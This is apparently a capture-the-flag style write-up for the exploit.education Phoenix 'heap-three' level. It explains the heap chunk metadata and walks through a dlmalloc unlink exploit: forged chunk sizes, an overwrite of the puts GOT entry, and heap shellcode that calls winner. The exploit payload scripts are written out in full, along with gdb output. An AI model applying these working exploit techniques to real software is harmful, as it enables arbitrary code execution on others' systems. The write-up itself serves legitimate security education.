exploit.education Phoenix - Heap 0x3
Write-up for: https://exploit.education/phoenix/heap-three/.
The vulnerability
The program allocates three 32-byte buffers in the heap, copies user data into these
buffers without checking the bounds of the input and then frees the buffers. The calls
to strcpy
are not bounds-checked and therefore prone to a heap-based buffer overflow.
Executing winner
Our first goal is to execute the winner
function. To do this, we need to overwrite the
GOT entry of printf
which is called at the end of the main
function. This means that
we will need an arbitrary write primitive.
We know that the malloc implementation stores metadata about allocated chunks next to the user data. Since we allocate multiple buffers in a row and we can overflow the first two buffers, we can overwrite this metadata. How does the chunk structure look like?
struct malloc_chunk {
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
};
This is a simplified representation of the actual chunks in memory since it ommits the actual user
data. Another aspect thats hidden in this struct definition is the fact that the size
field contains
additional flags (the least-significant bits of the field). One of these flags (the LSB) indicates if
the previous chunk is free or not. If it is set, prev_size
is also set. This will become interesting later on.
But first, let’s look at our heap once before allocation and once after freeing the heap memory:
gef➤ break *main+143
Breakpoint 4 at 0x804888b
gef➤ break *main+176
Breakpoint 5 at 0x80488ac
gef➤ run AAAAAAAA BBBBBBBB CCCCCCCC
gef➤ x/64x 0xf7e69058-88
0xf7e69000: 0x00000000 0x00000029 0x41414141 0x41414141
0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029
0xf7e69030: 0x42424242 0x42424242 0x00000000 0x00000000
0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69050: 0x00000000 0x00000029 0x43434343 0x43434343
0xf7e69060: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69070: 0x00000000 0x00000000 0x00000000 0x000fff89
0xf7e69080: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69090: 0x00000000 0x00000000 0x00000000 0x00000000
gef➤ x/64x 0xf7e69058-88
0xf7e69000: 0x00000000 0x00000029 0xf7e69028 0x41414141
0xf7e69010: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69020: 0x00000000 0x00000000 0x00000000 0x00000029
0xf7e69030: 0xf7e69050 0x42424242 0x00000000 0x00000000
0xf7e69040: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69050: 0x00000000 0x00000029 0x00000000 0x43434343
0xf7e69060: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69070: 0x00000000 0x00000000 0x00000000 0x000fff89
0xf7e69080: 0x00000000 0x00000000 0x00000000 0x00000000
0xf7e69090: 0x00000000 0x00000000 0x00000000 0x00000000
In the first print (before the free
calls), we can see all three buffers are next to each other in memory. All three user buffers start with 0x00000029
. Since
this is nothing we entered, it must be the metadata for the heap manager. We know the buffers have a size of 32 bytes (0x20).
There are 8 bytes of heap metadata, so 0x28. But why 0x29? This one bit is the “is previous chunk in use” flag.
After freeing, the picture is different from what we expect. Normally, freed chunks are stored in a ‘free list’, a doubly-linked list from where the heap manager
can re-use chunks. This is where the fd
, bk
and prev_size fields come into play. So we would excpect at least two pointers and a size in our data, right?
If we look closely, we can see that there is one pointer per chunk:
0xf7e69000: 0x00000000 0x00000029 0xf7e69028 0x41414141
0xf7e69028
clearly points to the next chunk (the one containing the ‘B’s). But what’s missing is the bk
pointer, as well as the prev_size
field.
The reason for this is, that small chunks are organized in a so called ‘fastbin’ after freeing. This is a singly-linked list structure that is used as
an optimization for small-size allocations. Chunks in a fastbin can be re-used very quickly for allocations of the same size. This is also explained
in the malloc
implementation:
/*
Fastbins
An array of lists holding recently freed small chunks. Fastbins
are not doubly linked. It is faster to single-link them, and
since chunks are never removed from the middles of these lists,
double linking is not necessary. Also, unlike regular bins, they
are not even processed in FIFO order (they use faster LIFO) since
ordering doesn't much matter in the transient contexts in which
fastbins are normally used.
Chunks in fastbins keep their inuse bit set, so they cannot
be consolidated with other free chunks. malloc_consolidate
releases all chunks in fastbins and consolidates them with
other free chunks.
*/
There are other resources that explain this stuff way more in-depth and better than I could. For example check out Azeria Labs’ excellent heap exploitation articles.
Let’s focus on how to use this knowledge for solving the challenge at hand.
The idea is to somehow
manipulate the heap manager into writing arbitrary data to a location of our choice. As a consequence,
we need to look for statements that write to memory in the normal code flow of the malloc implementation.
Following the free
function’s code flow, we will stumble accross the unlink
macro:
/* Take a chunk off a bin list */
#define unlink(P, BK, FD) { \
FD = P->fd; \
BK = P->bk; \
FD->bk = BK; \
BK->fd = FD; \
}
This operation is just implementing the standard way of taking something off of a doubly-linked list. Calling this will
effectively remove P
from the list by setting the backwards pointer of the next chunk (FD->bk
) to
the backwards pointer of P
(BK
) and setting the forward pointer of the previous chunk (BK->fd
) to
the forward pointer of P
(FD
). This is a write operation: the heap manager writes the value of P->bk
to
the location specified by FD.bk
. If we are able to control these values, we can write to a memory location of our choice!
This means if we can specify bk
and fd
of chunk P
the value of bk
will be written to the address specified at fd + 12
.
Let’s have a look at the call of unlink
:
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(p, bck, fwd);
}
As you can see, the P
we want to modify is actually the chunk at the offset of the chunk we call free
on and its prev_size
field.
bck
and fwd
are temporary variables. Let’s rewrite the unlink macro in the context of the c
chunk during the first free
call:
prev = (c - c->prev_size);
*(prev->fd + 12) = prev->bk;
*(prev->bk + 8) = prev->fd;
This indicates that we need to set prev_size
so that we can control the fd
and bk
values.
However, as we saw above, this unlink macro is not called for freed chunks in fastbins. How does the heap manager determine if a freed
chunk goes to a fastbin? The answer can be found in the implementation of free
:
/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/
if ((CHUNK_SIZE_T)(size) <= (CHUNK_SIZE_T)(av->max_fast)
Looking around the malloc source we find the definition for the maximum size of chunk that goes to fastbins:
/* The maximum fastbin request size we support */
#define MAX_FAST_SIZE 80
In reality, this might be smaller than 80 because it is configurable.
Now we have all the information we need. We can now use the overflow to construct the second and third heap chunks in a way that
ensures that unlink
is called. We also provide the address we want to write to and the word we want to write inside of this payload.
To recap:
size
of chunk to be freed must be greater than 80 to avoid fastbin handlingprev_inuse
flag must be unset, so that during the free operation,b
andc
are coalesced usingunlink
prev_size
must be safe to be subtracted from a pointer. Also it cannot contain null bytes
As a value for prev_size
we can use 0xfffffffc
. This fulfills two properties. Since this value is cast to long
in the prev
calculation, it is interpreted as -4
. This is safe to subtract from the current chunk pointer as it is
very small (in fact, we will add 4). Additionally, the LSB is set to zero, so we will call unlink
as intended.
So basically we write the value at c + 4 (prev_size) + 12
(prev->bk) to the address specified at c + 4 (prev_size) + 8
+ 12 (prev->fd).
This results in the following payload generation. We put random values for the write value and target address for now
to check if it works. We expect to see a write access violation from within the unlink
macro.
import struct
payload = ""
payload = payload + "A" * 32 # buf a
payload = payload + " " + "B" * 32 # buf b
# overwriting into chunk c
payload = payload + struct.pack("<I", 0xfffffffc) # prev_size
payload = payload + struct.pack("<I", 0xfffffffc) # size, must be greater than 80
payload = payload + "\xff\xff\xff\xff" # 4 bytes of chunk, since prev_size is 4
payload = payload + struct.pack("<I", 0xdeadbeef - 12) # TARGET
payload = payload + struct.pack("<I", 0xdeadbeef) # WORD TO WRITE
# satisfy strcpy for third argument
payload = payload + " CCCC"
print(payload)
It worked! As you can see, the program is trying to write 0xdeadbeef
to 0xdeadbe00 + 0xc
:
→ 0x8049941 <free+234> mov DWORD PTR [eax+0xc], edx
$eax : 0xdeadbe00
$ebx : 0xffffdcf0 → 0x00000004
$ecx : 0x0
$edx : 0xdeadbeef
Now we need to figure out what we want to write where in order to redirect execution to the winner
function.
What comes to mind is overwriting the GOT entry for puts
which is called after the free
calls.
First, we need to find the address of puts
in the PLT and of the winner
function:
(gdb) disas winner
Dump of assembler code for function winner:
0x080487d5 <+0>: push ebp
(gdb) disas 'puts@plt'
Dump of assembler code for function puts@plt:
0x080485b0 <+0>: jmp DWORD PTR ds:0x804c13c
0x080485b6 <+6>: push 0x28
0x080485bb <+11>: jmp 0x8048550
Now we change the payload and run the exploit.
(gdb) run $(python heap3.py)
Starting program: /opt/phoenix/i486/heap-three $(python heap3.py)
Program received signal SIGSEGV, Segmentation fault.
0x0804994a in free ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0x080487d5 → <winner+0> push ebp
$ebx : 0xffffdcf0 → 0x00000004
$ecx : 0x0
$edx : 0x0804c100 → <_DYNAMIC+156> add BYTE PTR [eax], al
$esp : 0xffffdc70 → 0x00000000
$ebp : 0xffffdca8 → 0xffffdcd8 → 0xffffdd78 → 0xffffdef2 → "_=/usr/local/bin/gdb"
$esi : 0xffffdd64 → 0xffffde7a → "/opt/phoenix/i486/heap-three"
$edi : 0x4
$eip : 0x0804994a → <free+243> mov DWORD PTR [eax+0x8], edx
$eflags: [carry parity adjust zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffdc70│+0x0000: 0x00000000 ← $esp
0xffffdc74│+0x0004: 0x00000028 ("("?)
0xffffdc78│+0x0008: 0x080487d5 → <winner+0> push ebp
0xffffdc7c│+0x000c: 0x0804c100 → <_DYNAMIC+156> add BYTE PTR [eax], al
0xffffdc80│+0x0010: 0xfffffffc
0xffffdc84│+0x0014: 0xfffffffc
0xffffdc88│+0x0018: 0xf7e6904c → 0x42424242
0xffffdc8c│+0x001c: 0xf7f8453e → <strcpy+30> add esp, 0x14
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
0x8049941 <free+234> mov DWORD PTR [eax+0xc], edx
0x8049944 <free+237> mov eax, DWORD PTR [ebp-0x30]
0x8049947 <free+240> mov edx, DWORD PTR [ebp-0x2c]
→ 0x804994a <free+243> mov DWORD PTR [eax+0x8], edx
0x804994d <free+246> mov eax, DWORD PTR [ebp-0x14]
0x8049950 <free+249> mov eax, DWORD PTR [eax+0x2c]
0x8049953 <free+252> cmp DWORD PTR [ebp-0x20], eax
0x8049956 <free+255> je 0x80499fc <free+421>
0x804995c <free+261> mov edx, DWORD PTR [ebp-0x20]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "heap-three", stopped, reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x804994a → free()
[#1] 0x8048890 → main()
Segfault? What happened here? If you look closely at the instructions, it becomes clear. We forgot about the second write
that is executed during unlink
:
*(prev->bk + 8) = prev->fd;
mov DWORD PTR [eax+0x8], edx
This means we are writing something 8 bytes after the start of the winner
function (the address of which is in prev->bk
).
This section of memory is flagged as read-only and thus the program crashes. We need a different strategy keeping the fact
in mind that both prev->bk + 8
and prev->fd + 12
must be writable addresses.
Our new strategy is to place a short shellcode on the heap and store the address of this shellcode in puts@plt
. The shellcode
will then call the winner
function. This additional indirection ensures that the second write happens in a writable memory
segment (the heap). We generate shellcode using the pwntools library and embed
it in our payload. Then we modify the word to write to be the address of our shellcode. We don’t care about the second write since
our shellcode is sufficiently short. The address of the shellcode is always the same on the system since ASLR is not enabled. We
can find the address of the heap using gdb (the first segment after the program):
(gdb) info proc mappings
process 9561
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x804c000 0x4000 0x0 /opt/phoenix/i486/heap-three
0x804c000 0x804d000 0x1000 0x3000 /opt/phoenix/i486/heap-three
0xf7e69000 0xf7f69000 0x100000 0x0
0xf7f69000 0xf7f6b000 0x2000 0x0 [vvar]
0xf7f6b000 0xf7f6d000 0x2000 0x0 [vdso]
0xf7f6d000 0xf7ffa000 0x8d000 0x0 /opt/phoenix/i486-linux-musl/lib/libc.so
0xf7ffa000 0xf7ffb000 0x1000 0x8c000 /opt/phoenix/i486-linux-musl/lib/libc.so
0xf7ffb000 0xf7ffc000 0x1000 0x8d000 /opt/phoenix/i486-linux-musl/lib/libc.so
0xf7ffc000 0xf7ffe000 0x2000 0x0
0xfffdd000 0xffffe000 0x21000 0x0 [stack]
This results in a new exploit:
import struct
import pwnlib
shellcode = "push 0x080487d5; ret" # call winner
shellcode = pwnlib.asm.asm(shellcode)
# First argument
payload = ""
payload = payload + "\x90" * 16 + shellcode # buffer a with shellcode and NOP sled
# Second argument
payload = payload + " " + "B" * 32 # buffer b
# overwriting into chunk c
payload = payload + struct.pack("<I", 0xfffffffc) # prev_size, -4 so we can control prev->bk and prev->fd
payload = payload + struct.pack("<I", 0xfffffffc) # size
# Third argument
payload = payload + " " + "\xff\xff\xff\xff" # 4 bytes of chunk, since prev_size is -4
payload = payload + struct.pack("<I", 0x804c13c - 12) # TARGET, puts@plt
payload = payload + struct.pack("<I", 0xf7e69000 + 16 + 8) # WORD TO WRITE, address of shellcode / buffer a
print(payload)
Let’s run it:
(gdb) run $(python heap3.py)
Starting program: /opt/phoenix/i486/heap-three $(python heap3.py)
Program received signal SIGSEGV, Segmentation fault.
→ 0x8049994 <free+317> mov DWORD PTR [eax+0xc], edx
We see yet another segfault during a familiar looking write operation. However, if we look closely, this is not the first unlink that
we were targeting (which was at free+234
). Re-visiting the malloc implementation reveals what happens:
if (nextchunk != av->top) {
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
set_head(nextchunk, nextsize);
/* consolidate forward */
if (!nextinuse) {
unlink(nextchunk, bck, fwd);
size += nextsize;
}
...
After successfully consolidating backwards with our crafted values, this code is executed. If the nextchunk
, which is calculated to be at
p + p->size
, is not the last chunk and the next chunk is not in use, it is also consolidated via unlink
. Since we control p->size
for our
crafted chunk, we can set it so that we do not take this branch. It has to fulfill these conditions:
- Contains no null bytes
p + p->size
points to a chunk that is in use, i.e. the is previous in use flag is not set in the following chunk
The ideal candidate is chunk a. We can set size
to -80 which tricks the malloc implementation into thinking the next chunk is chunk a.
Let’s try again:
import struct
import pwnlib
shellcode = "push 0x080487d5; ret" # call winner
shellcode = pwnlib.asm.asm(shellcode)
# First argument
payload = ""
payload = payload + "\x90" * 16 + shellcode # buffer a with shellcode and NOP sled
# Second argument
payload = payload + " " + "B" * 32 # buffer b
# overwriting into chunk c
payload = payload + struct.pack("<I", 0xfffffffc) # prev_size, -4 so we can control prev->bk and prev->fd
payload = payload + struct.pack("<I", 0xffffffb0) # size, -80 to point to chunk a
# Third argument
payload = payload + " " + "\xff\xff\xff\xff" # 4 bytes of chunk, since prev_size is -4
payload = payload + struct.pack("<I", 0x804c13c - 12) # TARGET, puts@plt
payload = payload + struct.pack("<I", 0xf7e69000 + 16 + 8) # WORD TO WRITE, address of shellcode / buffer a
print(payload)
root@phoenix-amd64:/opt/phoenix/i486# ./heap-three $(python heap3.py)
Level was successfully completed at @ 1556717659 seconds past the Epoch
Game over!
Final words
For me personally, this was by far the hardest challenge on exploit.education, yet. It took me a lot of time to understand this type of attack
and to implement it myself. So don’t be discouraged if you don’t understand what’s going on right away. Once you do, this
is a pretty eye opening exercise since we now advanced from simply overwriting some values in memory to carefully manipulating
the control flow of a program in order to execute our own code. I highly recommend reading the Phrack papers linked below that originally
discussed exploiting the unlink
macro.